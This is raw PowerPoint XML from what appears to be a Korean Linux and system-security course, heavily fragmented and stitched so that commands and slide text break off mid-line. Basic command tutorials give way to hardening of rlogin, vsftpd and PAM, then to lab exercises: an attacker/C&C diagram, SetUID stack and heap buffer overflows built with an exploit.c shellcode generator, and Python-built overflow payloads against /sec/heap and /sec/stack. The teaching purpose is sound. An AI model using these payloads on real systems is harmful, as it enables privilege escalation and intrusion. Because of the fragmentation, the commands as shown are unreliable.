                <a:t>test4</a:t>
              </a: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/test1/test2</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touch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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touch -t 202106141200 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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-r </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>oldfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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-l &gt; file1</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cat file1</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-al &gt; file2</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cat file1 file2</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-n file1</a:t>
              </a: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&gt; file3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="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file3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>test file...</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a:t>file2  file3  </a:t>
              </a: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file*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`file2'? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`file3'?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-r test3/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>디렉토리 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`test3/’?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test4</a:t>
              </a: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-rf test4/       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</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 remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>oldfile</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file1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t>File1</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mv file1 file2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t>File2</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file1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solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  file1  file2</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mv file1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solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  file2</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file1 file2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  file2</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file1 file2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solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>file1  file2</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dirty="0"/>
                <a:t>file1  file2</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7782743"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464688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1511023"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2458383"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1415400"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2598342"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3273183"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5</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2230200"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3413142"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3774146"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2738301"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3914105"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070777"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027794"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210736"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045865"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002882"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185824"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012923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--help</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Usage: 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or multiple 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--archive                same as -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>dR</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> --preserve=all</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>      --backup[=CONTROL]       make a backup of each existing destination file</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  -b                           like --backup but does not accept an argument</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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924959" y="2099144"/>
            <a:ext cx="4960705" cy="2531131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2481043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head/tail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cat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 less /etc/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rpcuser:x:29:29:RPC Service User:/var/lib/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NFS User:/var/lib/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dirty="0" err="1"/>
                <a:t>mqueue</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dirty="0" err="1"/>
                <a:t>mqueue</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distcache:x:94:94:Distcache:/:/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highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">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dirty="0"/>
                <a:t>, Page Up, Page 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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>head –n 5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> /etc/passwd  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>문서의 머리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(head)</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5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> /etc/passwd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dirty="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System</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Web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Malware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백도어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Metasploit,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dirty="0"/>
              <a:t>(test) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test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dirty="0" err="1">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dirty="0" err="1">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그림 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7530795-136A-42B6-8BCB-684E997C0896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8254800" y="2230747"/>
            <a:ext cx="3516064" cy="19018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dirty="0"/>
              <a:t># grep root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/rlogin</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep disable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ls –l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv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etc/hosts.equiv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rhost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-r packet.txt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dirty="0"/>
              <a:t>: qwer1031)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vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_list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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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user_list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(white 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(Pluggable Authentication Modules)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pam_wheel.so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pam_wheel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(wheel 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861763" y="4144317"/>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339711"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298536"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257361"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211455"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131"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54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95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37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454"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131"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54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95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37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454"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131"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54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95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37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454"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131"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54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95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37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454"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634740"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039446"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444153"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2848860"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255901"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1677849"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48726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29667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10609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4920172"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1677849"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48726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29667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10609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4920172"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1677849"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48726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29667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10609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4920172"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177838"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1666258"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8200201" y="2783189"/>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315640"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1099"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400391"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400391"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1099"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485935"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3991394"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161689"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161689"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2800479"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026239"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485935"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089954" y="3579815"/>
            <a:ext cx="975028" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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113983" y="2022462"/>
            <a:ext cx="919391" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>C&amp;C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570686"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570686"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026239" y="3121215"/>
            <a:ext cx="719330" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Router 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385904"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8036688" y="4383802"/>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8200201" y="4922689"/>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8011106" y="4630709"/>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7734" y="4528615"/>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863563" y="4150377"/>
            <a:ext cx="1157864" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;WSL2 docker&gt;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14934" y="4441152"/>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8036688" y="4654562"/>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424568" y="5407573"/>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795861" y="3675355"/>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/sec/bof64.c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dirty="0"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">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bof64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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian)</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dirty="0" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># sysctl –w kernel.randomize_va_space=2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위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test </a:t>
            </a:r>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/sec/bof64 $(python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endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2)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만드는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exploit.c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/sec/stack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stack | more</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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exploit.c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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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-o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./exploit 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맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>memset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> (&amp; buffer,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dirty="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주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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(buffer + off)) = (long) (buffer +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/sec/stack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memcpy</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 shellcode,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a:t>
                      </a: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상태에서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execstack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/sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –c /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –q /sec/stack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heap.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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goodfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ /sec/heap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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>힙 버퍼 오버플로우 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap $(python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/sec/heap $(python -c 'print "A"*112+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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파일명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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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871866597"/>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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Race 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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Wireshark,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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에서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/sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l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(CentOS5.5)</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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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-M intel -d /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
